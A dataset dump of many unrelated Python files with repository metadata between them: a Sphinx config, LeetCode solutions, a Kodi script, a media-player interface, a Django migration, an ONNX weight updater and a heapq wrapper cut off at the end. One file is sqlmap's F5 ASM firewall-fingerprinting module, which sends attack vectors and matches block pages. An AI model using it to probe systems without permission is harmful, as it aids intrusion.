    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',

    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'higlass.tex', 'HiGlass Documentation',
     'Peter Kerpedjiev', 'manual'),
]

# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'higlass', 'HiGlass Documentation',
     [author], 1)
]

# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'higlass', 'HiGlass Documentation',
     author, 'HiGlass', 'A visual explorer for large genomic data.',
     'Miscellaneous'),
]
|
[
"pkerpedjiev@gmail.com"
] |
pkerpedjiev@gmail.com
|
2285b70ca377c6f1d7352094d1f626929e63df89
|
c21546695e35a3f7c60e684de04bcbe88b2b985a
|
/0191_Number_of_1_Bits.py
|
c55f7da2b0e4f58f2b0605fc72f4ee8b7757bcc1
|
[] |
no_license
|
piecesofreg09/study_leetcode
|
4a05ddee44c72a6d0c50bca7cb0b70abd33b0b85
|
fc69721dbe003fcc2f7795a6b38c41d877905205
|
refs/heads/master
| 2023-01-14T05:02:24.779136
| 2020-11-18T17:23:30
| 2020-11-18T17:23:30
| 288,774,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
'''
n & n - 1 will remove the rightmost 1 to be 0
'''


class Solution:
    def hammingWeight(self, n: int) -> int:
        """Return the number of set bits in *n* (Kernighan's popcount).

        Each iteration of ``n &= n - 1`` clears exactly the lowest set bit,
        so the loop runs once per 1-bit rather than once per bit position.
        """
        bits = 0
        while n:
            n &= n - 1  # drop the lowest set bit
            bits += 1
        return bits
|
[
"noreply@github.com"
] |
piecesofreg09.noreply@github.com
|
186aad5955392fda1d645d2081f56cfc70054898
|
9b9fa48ec458fec2b451b3be54bf2be23188b11e
|
/labs/functions/character_permutations.py
|
08fb258bbbda4e629cb991a9d908bb5c6e327b6c
|
[] |
no_license
|
Nikoletazl/Advanced-Python
|
1bc55ce42693ff0a5bcf082f9f7867e07b771007
|
f1e31fbd423b31e2b24db151df8b73c7eaf35ab5
|
refs/heads/main
| 2023-08-21T20:46:43.572803
| 2021-10-22T09:47:52
| 2021-10-22T09:47:52
| 415,001,443
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 337
|
py
|
def permute(index, values):
    """Print every permutation of *values* via swap-based recursion.

    Positions before *index* are fixed; each element from *index* onward is
    swapped into place, the tail is permuted recursively, and the swap is
    undone (backtracking) so *values* is restored for the next iteration.

    :param index: position currently being filled (start the recursion at 0)
    :param values: mutable list of single characters; printed joined per
                   permutation, restored to its original order on return
    """
    if index == len(values):
        print("".join(values))
        return
    for i in range(index, len(values)):
        values[i], values[index] = values[index], values[i]
        permute(index + 1, values)
        # Undo the swap so subsequent iterations see the original order.
        values[i], values[index] = values[index], values[i]


if __name__ == "__main__":
    # Bug fix: the original called input() at module level, so merely
    # importing this file blocked on stdin; guard the I/O behind __main__.
    permute(0, list(input()))
|
[
"noreply@github.com"
] |
Nikoletazl.noreply@github.com
|
cc4a17a7174b8409f4875d4c7fce223c8ee00a2d
|
cd486d096d2c92751557f4a97a4ba81a9e6efebd
|
/18/addons/context.venom/playFromHere.py
|
887d841b3746e04a0b3b31161b57f8631de3a007
|
[] |
no_license
|
bopopescu/firestick-loader-kodi-data
|
2f8cb72b9da67854b64aa76f720bdad6d4112926
|
e4d7931d8f62c94f586786cd8580108b68d3aa40
|
refs/heads/master
| 2022-04-28T11:14:10.452251
| 2020-05-01T03:12:13
| 2020-05-01T03:12:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,874
|
py
|
# Kodi context-menu script for the Venom add-on: inspect the selected list
# item, extract show/episode identifiers from its plugin:// URL, and trigger
# the add-on's "playAll" action so playback starts from the chosen episode.
import sys, xbmc, json
try:
    # Python 2 locations of the URL helpers.
    from urlparse import parse_qsl
    from urllib import quote_plus
except:
    # Python 3 fallback.
    from urllib.parse import parse_qsl, quote_plus

# NOTE(review): 2 is passed as the xbmc.log level; its meaning differs
# between Kodi versions (LOGWARNING pre-19, LOGINFO on 19+) — confirm.
xbmc.log('__name__= %s' % __name__, 2)
xbmc.log('__package__= %s' % __package__, 2)
# sys.path = []
# if __name__ == '__main__' and __package__ is None:
	# from os import sys, path
	# test = sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
	# xbmc.log('test= %s' % test, 2)


if __name__ == '__main__':
    # sys.listitem is injected by Kodi for context-menu scripts.
    item = sys.listitem
    message = item.getLabel()
    path = item.getPath()
    xbmc.log('path = %s' % path, 2)
    plugin = 'plugin://plugin.video.venom/'
    # Everything after the plugin base URL is the query string.
    args = path.split(plugin, 1)
    xbmc.log('args = %s' % args, 2)
    params = dict(parse_qsl(args[1].replace('?', '')))
    xbmc.log('playlist = %s' % len(xbmc.PlayList(xbmc.PLAYLIST_VIDEO)), 2)

    # Identifiers may arrive either as a JSON 'meta' blob or as flat
    # query-string parameters; both shapes are handled.
    if 'meta' in params:
        meta = json.loads(params['meta'])
        year = meta.get('year', '')
        imdb = meta.get('imdb', '')
        tmdb = meta.get('tmdb', '')
        tvdb = meta.get('tvdb', '')
        season = meta.get('season', '')
        episode = meta.get('episode', '')
        tvshowtitle = meta.get('tvshowtitle', '')
    else:
        year = params.get('year', '')
        imdb = params.get('imdb', '')
        tmdb = params.get('tmdb', '')
        tvdb = params.get('tvdb', '')
        season = params.get('season', '')
        episode = params.get('episode', '')
        tvshowtitle = params.get('tvshowtitle', '')

    # items = seasons.Seasons().tvdb_list(item['tvshowtitle'], item['year'], item['imdb'], item['tmdb'], item['tvdb'], control.apiLanguage()['tvdb'], '-1') # fetch new meta (uncached)
    # for item in items:
    # path = '%s?action=episodes&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&season=%s&episode=%s' % (
    # plugin, tvshowtitle, year, imdb, tmdb, tvdb, season, episode)
    # path = 'PlayMedia(%s?action=playAll)' % plugin
    path = 'RunPlugin(%s?action=playAll)' % plugin
    xbmc.executebuiltin(path)
|
[
"esc0rtd3w@gmail.com"
] |
esc0rtd3w@gmail.com
|
c31e659110b66300d3a5f2982f28690d73a5c462
|
4ed3db861ae2fe727c7be604d42d540a00923320
|
/samsung_multiroom/service/player.py
|
68cf53039187d62a94f10fb1ba54dd7a7eac1581
|
[
"MIT"
] |
permissive
|
kusma/samsung_multiroom
|
7cac147283a52bf491d7f50a6569c64de53eb4a5
|
09ca86d27b87a4aa0c97ec2accbd4ec67dd0cc61
|
refs/heads/master
| 2020-12-04T07:46:19.688568
| 2019-04-20T16:29:44
| 2019-04-20T16:29:44
| 231,683,383
| 0
| 0
|
MIT
| 2020-01-03T23:47:29
| 2020-01-03T23:47:28
| null |
UTF-8
|
Python
| false
| false
| 6,225
|
py
|
"""Player allows playback control depending on selected source."""
import abc

# repeat mode constants
REPEAT_ONE = 'one'  # repeat only the current track
REPEAT_ALL = 'all'  # repeat the whole queue
REPEAT_OFF = 'off'  # no repeat
class Player(metaclass=abc.ABCMeta):
    """Player interface to control playback functions.

    Concrete players implement the abstract methods below for one source
    (e.g. DLNA, TuneIn).  Methods that a player cannot support may be marked
    with the module-level ``@unsupported`` decorator; callers can then probe
    support via the synthesized ``is_<method>_supported()`` accessors (see
    ``__getattribute__``).
    """

    @abc.abstractmethod
    def play(self, playlist):
        """
        Enqueue and play a playlist.

        Player may choose to not play the playlist if it's not compatible with this player. For instance you can't
        play DLNA source tracks using TuneIn player. If player is unable to play the playlist it must return False.

        :param playlist: Iterable returning player combatible objects
        :returns: True if playlist was accepted, False otherwise
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def jump(self, time):
        """
        Advance current playback to specific time.

        :param time: Time from the beginning of the track in seconds
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def resume(self):
        """Play/resume current track."""
        raise NotImplementedError()

    @abc.abstractmethod
    def stop(self):
        """Stop current track and reset position to the beginning."""
        raise NotImplementedError()

    @abc.abstractmethod
    def pause(self):
        """Pause current track and retain position."""
        raise NotImplementedError()

    @abc.abstractmethod
    def next(self):
        """Play next track in the queue."""
        raise NotImplementedError()

    @abc.abstractmethod
    def previous(self):
        """Play previous track in the queue."""
        raise NotImplementedError()

    @abc.abstractmethod
    def repeat(self, mode):
        """
        Set playback repeat mode.

        :param mode: one of REPEAT_* constants
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def shuffle(self, enabled):
        """
        Enable/disable playback shuffle mode.

        :param enabled: True to enable, False to disable
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def get_repeat(self):
        """
        Get playback repeat mode.

        :returns: one of REPEAT_* constants
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def get_shuffle(self):
        """
        Get playback shuffle mode.

        :returns: boolean, True if enabled, False otherwise
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def get_current_track(self):
        """
        Get current track info.

        :returns: Track instance, or None if unavailable
        """
        raise NotImplementedError()

    @abc.abstractmethod
    def is_active(self, function, submode=None):
        """
        Check if this player is active based on current function/submode.

        :returns: Boolean True if function/submode is supported
        """
        raise NotImplementedError()

    def __getattribute__(self, name):
        """
        Magic is_[function]_supported method.

        Function can be any Player method. In order to mark method as unsupported, use @unsupported decorator.

        Example:
            MyPlayer(Player):
                @unsupported
                def play(self, playlist):
                    return False

            player = MyPlayer()
            player.is_play_supported() # returns False
        """
        try:
            # Normal attribute lookup first; the magic only kicks in for
            # names that do not exist on the instance/class.
            return super().__getattribute__(name)
        except AttributeError:
            # Only names of the form is_<function>_supported are synthesized.
            function_name = get_is_supported_function_name(name)
            if not function_name:
                raise
            if not hasattr(self, function_name):
                raise
            function = getattr(self, function_name)
            # Methods not marked with @unsupported are supported by default.
            if not hasattr(function, '__is_supported__'):
                return lambda: True
            return lambda: bool(function.__is_supported__)
class Track:
    """Defines a media track on the playlist.

    All core attributes are exposed as read-only properties; any extra
    source-specific values live in *metadata* and are reachable as plain
    attributes via ``__getattr__`` (missing keys read as None).
    """

    def __init__(self, title, artist, album, duration, position, thumbnail_url, metadata=None):
        """
        :param title: Track title
        :param artist: Track artist
        :param album: Album title
        :param duration: Duration in seconds
        :param position: Current playback position in seconds
        :param thumbnail_url: URL of the track thumbnail
        :param metadata: Optional dict of extra source-specific values
        """
        self._title = title
        self._artist = artist
        self._album = album
        self._duration = duration
        self._position = position
        self._thumbnail_url = thumbnail_url
        self._metadata = metadata or {}

    @property
    def title(self):
        """
        :returns: Title of the current track
        """
        return self._title

    @property
    def artist(self):
        """
        :returns: Artist of the current track
        """
        return self._artist

    @property
    def album(self):
        """
        :returns: Album title of the current track
        """
        return self._album

    @property
    def duration(self):
        """
        :returns: Duration in seconds
        """
        return self._duration

    @property
    def position(self):
        """
        :returns: Current playback position in seconds
        """
        return self._position

    @property
    def thumbnail_url(self):
        """
        :returns: URL of the track thumbnail
        """
        return self._thumbnail_url

    def __repr__(self):
        """Debug-friendly representation (new, backward-compatible addition)."""
        return '{}(title={!r}, artist={!r}, album={!r})'.format(
            type(self).__name__, self._title, self._artist, self._album)

    def __getattr__(self, name):
        """
        :returns: Metadata item value, or None when the key is absent
        """
        # Called only when normal lookup fails, so properties above win.
        if name in self._metadata:
            return self._metadata[name]
        return None
def init_track_kwargs(object_type):
    """
    :param object_type: value stored under metadata['object_type']
    :returns: kwargs dict for Track initialisation, all fields defaulted to None
    """
    kwargs = dict.fromkeys(
        ['title', 'artist', 'album', 'duration', 'position', 'thumbnail_url'])
    kwargs['metadata'] = {
        'object_id': None,
        'object_type': object_type,
    }
    return kwargs
def unsupported(function):
    """Decorator marking a player function as unsupported (sets the
    ``__is_supported__`` flag checked by ``is_*_supported`` lookups)."""
    setattr(function, '__is_supported__', False)
    return function
def get_is_supported_function_name(name):
    """
    :param name: attribute name being resolved
    :returns: embedded function name when *name* has the
        is_[function_name]_supported shape, None otherwise
    """
    import re
    match = re.match(r'^is_(\w+)_supported$', name)
    if match is None:
        return None
    return match.group(1)
|
[
"k.galutowski@gmail.com"
] |
k.galutowski@gmail.com
|
4071d21eb5cd3463dc714a85424e09a1fedfa660
|
cd3e195e3eff75a01d93fe6a3df082bc839507db
|
/Prime_range.py
|
57398abf3955c4143a4b1ae5cd175f678247cfe2
|
[] |
no_license
|
swathichinnaiyan/Sandya
|
493002be8b221cad7af63bc0ee5833ef678171d2
|
34b77340f556054dd39c2a5de4ed933943ada319
|
refs/heads/master
| 2020-06-09T00:38:02.884184
| 2019-05-28T12:44:48
| 2019-05-28T12:44:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 219
|
py
|
# Count the prime numbers in the inclusive range [n, k].
# Reads "n k" from stdin and prints the count, like the original script.
n, k = map(int, input().split())
count = 0
for num in range(n, k + 1):
    # Bug fix: the original never ran its divisor loop for num < 2, so the
    # stale flag counted 0 and 1 as primes. They are not.
    if num < 2:
        continue
    # Trial division up to sqrt(num) is sufficient and replaces the
    # original O(num) scan (which also used bitwise & instead of "and").
    if all(num % d for d in range(2, int(num ** 0.5) + 1)):
        count += 1
print(count)
|
[
"noreply@github.com"
] |
swathichinnaiyan.noreply@github.com
|
d4ea202031d8effa052f5564c89a304be2b0d059
|
1e826a1c4194aaba4e84c3dfeb7976f1ed3f2e78
|
/news/news_project/comments/migrations/0002_auto_20200801_1158.py
|
7570e07062b98136f31ef9e35be2eca3ba793561
|
[] |
no_license
|
choirulihwan/django
|
95e62c8601dc34ddc7a3b816296683437fbc57f8
|
5cee04f4443f463088a5309b81aee6cb688f15ac
|
refs/heads/master
| 2022-12-13T10:07:12.276471
| 2022-01-09T08:57:36
| 2022-01-09T08:57:36
| 237,208,107
| 0
| 0
| null | 2022-11-22T09:48:06
| 2020-01-30T12:26:17
|
HTML
|
UTF-8
|
Python
| false
| false
| 988
|
py
|
# Generated by Django 3.0.8 on 2020-08-01 04:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Replace Comment's free-text ``username`` with real foreign keys.

    Drops ``comment.username`` and adds nullable FKs to the commented
    article and to the authoring user; SET_NULL keeps comments alive when
    either target is deleted.
    """
    dependencies = [
        ('articles', '0005_auto_20200621_1449'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('comments', '0001_initial'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='comment',
            name='username',
        ),
        migrations.AddField(
            model_name='comment',
            name='article',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='articles.Article'),
        ),
        migrations.AddField(
            model_name='comment',
            name='user_comment',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='commentator', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
[
"aristhu_oracle@yahoo.com"
] |
aristhu_oracle@yahoo.com
|
c6fefc0d9cd14428c2fecf957fb3004e2681e8c1
|
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
|
/tests/artificial/transf_Quantization/trend_Lag1Trend/cycle_12/ar_12/test_artificial_32_Quantization_Lag1Trend_12_12_20.py
|
eb6deb2d6bbd89999096af776def00111e27d043
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jmabry/pyaf
|
797acdd585842474ff4ae1d9db5606877252d9b8
|
afbc15a851a2445a7824bf255af612dc429265af
|
refs/heads/master
| 2020-03-20T02:14:12.597970
| 2018-12-17T22:08:11
| 2018-12-17T22:08:11
| 137,104,552
| 0
| 0
|
BSD-3-Clause
| 2018-12-17T22:08:12
| 2018-06-12T17:15:43
|
Python
|
UTF-8
|
Python
| false
| false
| 273
|
py
|
# Generated pyaf regression driver: build one artificial time series and run
# the full forecasting pipeline over it.
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
# 32-point daily series, Lag1Trend trend, cycle length 12, Quantization
# transform, no noise (sigma=0), 20 exogenous variables, AR order 12.
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
4f58e11e6d3006d75c64a4af4da9ea4792b0bd65
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_detain.py
|
3dfe8ec171cbb2f81c8c7242a587dcbea4b45df8
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
# class header
class _DETAIN():
def __init__(self,):
self.name = "DETAIN"
self.definitions = [u'to force someone officially to stay in a place: ', u'to delay someone for a short length of time: ', u'to keep someone in prison for as long as the courts feel is necessary']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'verbs'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
fd8ed3a75dca376e8d0523b9c1913aeb43585369
|
d305e9667f18127e4a1d4d65e5370cf60df30102
|
/scripts/update_onnx_weight.py
|
eaff46f61b3bafc13431d6b903dee7bce0b5030e
|
[
"Apache-2.0",
"MIT",
"Libpng",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"AGPL-3.0-only",
"MPL-2.0-no-copyleft-exception",
"IJG",
"Zlib",
"MPL-1.1",
"BSD-3-Clause",
"BSD-3-Clause-Open-MPI",
"MPL-1.0",
"GPL-2.0-only",
"MPL-2.0",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
imyzx2017/mindspore_pcl
|
d8e5bd1f80458538d07ef0a8fc447b552bd87420
|
f548c9dae106879d1a83377dd06b10d96427fd2d
|
refs/heads/master
| 2023-01-13T22:28:42.064535
| 2020-11-18T11:15:41
| 2020-11-18T11:15:41
| 313,906,414
| 6
| 1
|
Apache-2.0
| 2020-11-18T11:25:08
| 2020-11-18T10:57:26
| null |
UTF-8
|
Python
| false
| false
| 2,557
|
py
|
#!/usr/bin/env python3
# coding=UTF-8
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Function:
Use checkpoint file and onnx file as inputs, create a new onnx with Initializer's value from checkpoint file
Usage:
python update_onnx_weight.py onnx_file checkpoint_file [output_file]
"""
import sys
from onnx import onnx_pb
from mindspore.train.serialization import load_checkpoint
def update_onnx_initializer(onnx_file, ckpt_file, output_file):
    """Rewrite the initializers of *onnx_file* with weights from *ckpt_file*.

    Initializers missing from the checkpoint, or whose byte size differs
    from the checkpoint tensor, are left untouched (with a warning). The
    patched model is serialized to *output_file*.
    """
    with open(onnx_file, 'rb') as onnx_stream:
        model = onnx_pb.ModelProto()
        model.ParseFromString(onnx_stream.read())
    initializer = model.graph.initializer
    param_dict = load_checkpoint(ckpt_file)
    for item in initializer:
        if item.name not in param_dict:
            print(f"Warning: Can not find '{item.name}' in checkpoint parameters dictionary")
            continue
        bin_data = param_dict[item.name].data.asnumpy().tobytes()
        # Only replace when the serialized sizes agree; a mismatch would
        # corrupt the tensor layout.
        if len(bin_data) != len(item.raw_data):
            print(f"Warning: Size of weight from checkpoint is different from original size, ignore it")
            continue
        item.raw_data = bin_data
    with open(output_file, 'wb') as out_stream:
        out_stream.write(model.SerializeToString())
    print(f'Graph name: {model.graph.name}')
    print(f'Initializer length: {len(initializer)}')
    print(f'Checkpoint dict length: {len(param_dict)}')
    print(f'The new weights have been written to file {output_file} successfully')
def main():
    """CLI entry point: ``onnx_file checkpoint_file [output_file]``."""
    argv = sys.argv
    if len(argv) < 3:
        print(f'Usage: {argv[0]} onnx_file checkpoint_file [output_file]')
        sys.exit(1)
    onnx_file, ckpt_file = argv[1], argv[2]
    # Default output name mirrors the input with a "new_" prefix.
    output_file = argv[3] if len(argv) > 3 else f'new_{onnx_file}'
    update_onnx_initializer(onnx_file, ckpt_file, output_file)


if __name__ == '__main__':
    main()
|
[
"513344092@qq.com"
] |
513344092@qq.com
|
869cbcd717d4522fce402db11a0f1460e1bfc621
|
5ff8cefa68d52d2427bb3d35320cd8bd0d072968
|
/Python/StringExample1.py
|
7a0151c415f069ae83b964413dd1a6c11c307e85
|
[] |
no_license
|
gsudarshan1990/PythonSampleProjects
|
a65a111454f8dc551f1cd29901cead0798ad6dc3
|
3c1a5174c5f966b0eed2828221add76ec0d019d5
|
refs/heads/master
| 2020-05-09T16:02:37.743568
| 2019-07-14T06:22:55
| 2019-07-14T06:22:55
| 181,255,262
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
# Tutorial script: string indexing, slicing and character counting.
string1='banana'
# Indexing is zero-based.
print(string1[1])
print(string1[0])
# Walk the string by index with a while loop...
index=0
while index<len(string1):
    print(string1[index])
    index=index+1
# ...and the idiomatic way, iterating characters directly.
for char in string1:
    print(char)
s='Monty Python'
# Slices: [start:stop] excludes stop.
print(s[0:5])
print(s[6:len(s)])
fruit='banana'
# Omitted bounds default to the ends of the string.
print(fruit[:3])
print(fruit[3:])
#count of 'a' in banana
count=0
fruit='banana'
for letter in fruit:
    if letter == 'a':
        count=count+1
print(count)
def count_letter(fruit, letter):
    """Print how many times *letter* occurs in the string *fruit*."""
    occurrences = 0
    for current_char in fruit:
        if current_char == letter:
            occurrences += 1
    print(occurrences)
count_letter('banana','a')
# Membership tests on strings.
print('a' in 'banana')
print('seed' in 'banana')
word='banana'
if word == 'banana':
    print('both the words are same')
# String comparison is lexicographic.
word1='apple'
word2='orange'
if word1<word:
    print('Apple come Before Banana')
if word2>word:
    print('Oragne comes after banana')
# Introspection: type() and dir() list an object's attributes.
stuff='Hello World'
print(type(stuff))
print(dir(stuff))
string1='Good Morning'
print(dir(string1))
list1=[1,2,3]
print(dir(list1))
list1.append(4)
print(list1)
# help() prints its own output and returns None, hence the extra "None".
print(help(stuff.capitalize()))
# Common string methods: upper/find return new values, strings are immutable.
string2='banana'
string3=string2.upper()
print(string3)
index_of_a=string2.find('a')
print(index_of_a)
print(string2.find('na'))
print(string2.find('na',3))
line=' Here we go '
print(line.strip())
print(line.rstrip())
line='Have a nice day'
print(line.startswith('Have'))
# startswith is case-sensitive, so this prints False.
print(line.startswith('h'))
# Extract the host part of an e-mail address between '@' and the next space.
data='From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008'
initial_position=data.find('@')
space=data.find(' ',initial_position)
print(initial_position)
print(space)
print(data[initial_position+1:space])
|
[
"sudharshan.govindarajan@ey.com"
] |
sudharshan.govindarajan@ey.com
|
a821b7476c8f38c2679e241169a4e01ca9220af4
|
779c469b548d42dc679bf34da6041c813a7ce9cc
|
/sphinx_template/my_package/viz.py
|
3026a4ac69e8fb1c3f86813e32afdc92271c6376
|
[
"MIT"
] |
permissive
|
millerbest/zero_to_docs
|
b2e68af564db8f47441d44ded18c3a8a3b0c21f2
|
3f5c72ca76c457fefaba9b2a182e11cc89e5bf6d
|
refs/heads/master
| 2021-08-14T14:35:37.415612
| 2017-11-16T01:08:21
| 2017-11-16T01:26:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
import numpy as np
import matplotlib.pyplot as plt
def plot_random_dots(N, scale=10, ax=None, cmap=None):
    """Scatter-plot N random 2-D points drawn from a standard normal.

    Parameters
    ----------
    N : int
        Number of points to draw.
    scale : float, optional
        Multiplier applied to each point's distance from the origin to
        obtain its marker size.
    ax : matplotlib Axes, optional
        Axes to draw on; a fresh figure/axes pair is created when omitted.
    cmap : matplotlib colormap, optional
        Colormap forwarded to ``Axes.scatter`` (defaults to viridis).

    Returns
    -------
    The Axes the dots were drawn on.
    """
    if ax is None:
        fig, ax = plt.subplots()
    if cmap is None:
        cmap = plt.cm.viridis
    dots = np.random.randn(2, N)
    # Bug fix: the original passed ``dots * scale`` — a (2, N), possibly
    # negative array — as marker sizes, but scatter expects one
    # non-negative size per point. Use each point's distance from the
    # origin instead.
    sizes = np.hypot(dots[0], dots[1]) * scale
    ax.scatter(*dots, s=sizes, cmap=cmap)
    return ax
|
[
"choldgraf@berkeley.edu"
] |
choldgraf@berkeley.edu
|
39a8852e875c0852577e8c9e9103df9b6f18d343
|
6deafbf6257a5c30f084c3678712235c2c31a686
|
/Toolz/sqlmap/waf/asm.py
|
17244efb49a3344e7790047f270fd98805bfc3e7
|
[
"Unlicense",
"LicenseRef-scancode-generic-cla",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"LicenseRef-scancode-commercial-license",
"LicenseRef-scancode-other-permissive"
] |
permissive
|
thezakman/CTF-Heaven
|
53fcb4a72afa821ad05d8cc3b309fb388f958163
|
4b52a2178922f1502ab00fa8fc156d35e1dc653f
|
refs/heads/master
| 2023-04-05T18:20:54.680378
| 2023-03-21T13:47:45
| 2023-03-21T13:47:45
| 167,290,879
| 182
| 24
|
Unlicense
| 2022-11-29T21:41:30
| 2019-01-24T02:44:24
|
Python
|
UTF-8
|
Python
| false
| false
| 671
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "Application Security Manager (F5 Networks)"
def detect(get_page):
    """Return True when F5 ASM's block page is seen for any attack vector."""
    for vector in WAF_ATTACK_VECTORS:
        page, headers, code = get_page(get=vector)
        content = page or ""
        blocked = "The requested URL was rejected. Please consult with your administrator." in content
        if not blocked:
            # Alternate fingerprint: both f5aas markers must be present.
            blocked = ("security.f5aas.com" in content
                       and "Please enable JavaScript to view the page content" in content)
        if blocked:
            return True
    return False
|
[
"thezakman@ctf-br.org"
] |
thezakman@ctf-br.org
|
83a7cf76438adbf0701b18c3ad90a86a5c6c7c4f
|
880a56c0eebcce3376d1969bb8b084d82b90f535
|
/xos/tosca/resources/vcpeservice.py
|
2a6a56db92968457ed9e7b053b4e159a17d86f92
|
[
"Apache-2.0"
] |
permissive
|
digideskio/xos
|
9f590a3a2703198c4d5b9b2fa27a3b9a94c14b96
|
9c98f28793ce4b2e4be96665e7f06b9cf9b59315
|
refs/heads/master
| 2020-12-03T08:13:08.982841
| 2016-04-06T00:39:06
| 2016-04-06T00:39:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 631
|
py
|
import os
import pdb
import sys
import tempfile
sys.path.append("/opt/tosca")
from translator.toscalib.tosca_template import ToscaTemplate
from services.cord.models import VSGService
from service import XOSService
class XOSVsgService(XOSService):
    """TOSCA adapter mapping tosca.nodes.VSGService onto the VSGService model."""
    # TOSCA node type this adapter handles.
    provides = "tosca.nodes.VSGService"
    # Django model the TOSCA node is materialised as.
    xos_model = VSGService
    # Properties copied verbatim from the TOSCA template into the model.
    copyin_props = ["view_url", "icon_url", "enabled", "published", "public_key",
                    "private_key_fn", "versionNumber", "backend_network_label",
                    "wan_container_gateway_ip", "wan_container_gateway_mac",
                    "wan_container_netbits", "dns_servers", "node_label"]
|
[
"smbaker@gmail.com"
] |
smbaker@gmail.com
|
d2d18338371df02f19a8aa511ed62c3486298a71
|
50008b3b7fb7e14f793e92f5b27bf302112a3cb4
|
/recipes/Python/437116_Wrapper_class_heapq/recipe-437116.py
|
0d8f07bdf229fd1e0efdc4a367c438cd088d4c8f
|
[
"MIT",
"Python-2.0"
] |
permissive
|
betty29/code-1
|
db56807e19ac9cfe711b41d475a322c168cfdca6
|
d097ca0ad6a6aee2180d32dce6a3322621f655fd
|
refs/heads/master
| 2023-03-14T08:15:47.492844
| 2021-02-24T15:39:59
| 2021-02-24T15:39:59
| 341,878,663
| 0
| 0
|
MIT
| 2021-02-24T15:40:00
| 2021-02-24T11:31:15
|
Python
|
UTF-8
|
Python
| false
| false
| 3,197
|
py
|
import heapq
class Heap(list):
    """A list subclass wrapping the heap functions of the heapq module.

    The heap invariant is established at construction and maintained by
    push/popmin/replace/pushpop/reduce.
    """
    __slots__ = ()

    def __init__(self, t=()):
        # Fix: the original default was a mutable list (t=[]); an empty
        # tuple avoids the shared-mutable-default anti-pattern.
        self.extend(t)
        self.heapify()

    # Fix: the original aliased the heapq C builtins as class attributes
    # (push = heapq.heappush, ...). Built-in functions are not descriptors,
    # so instance calls like heap.push(item) never bound the heap argument
    # and raised TypeError on modern CPython. Real methods are required.
    def push(self, item):
        "Push item onto the heap, keeping the heap invariant"
        heapq.heappush(self, item)

    def popmin(self):
        "Pop and return the smallest item from the heap"
        return heapq.heappop(self)

    def replace(self, item):
        "Pop the smallest item, push the new item, return the popped one"
        return heapq.heapreplace(self, item)

    def heapify(self):
        "Re-establish the heap invariant in place"
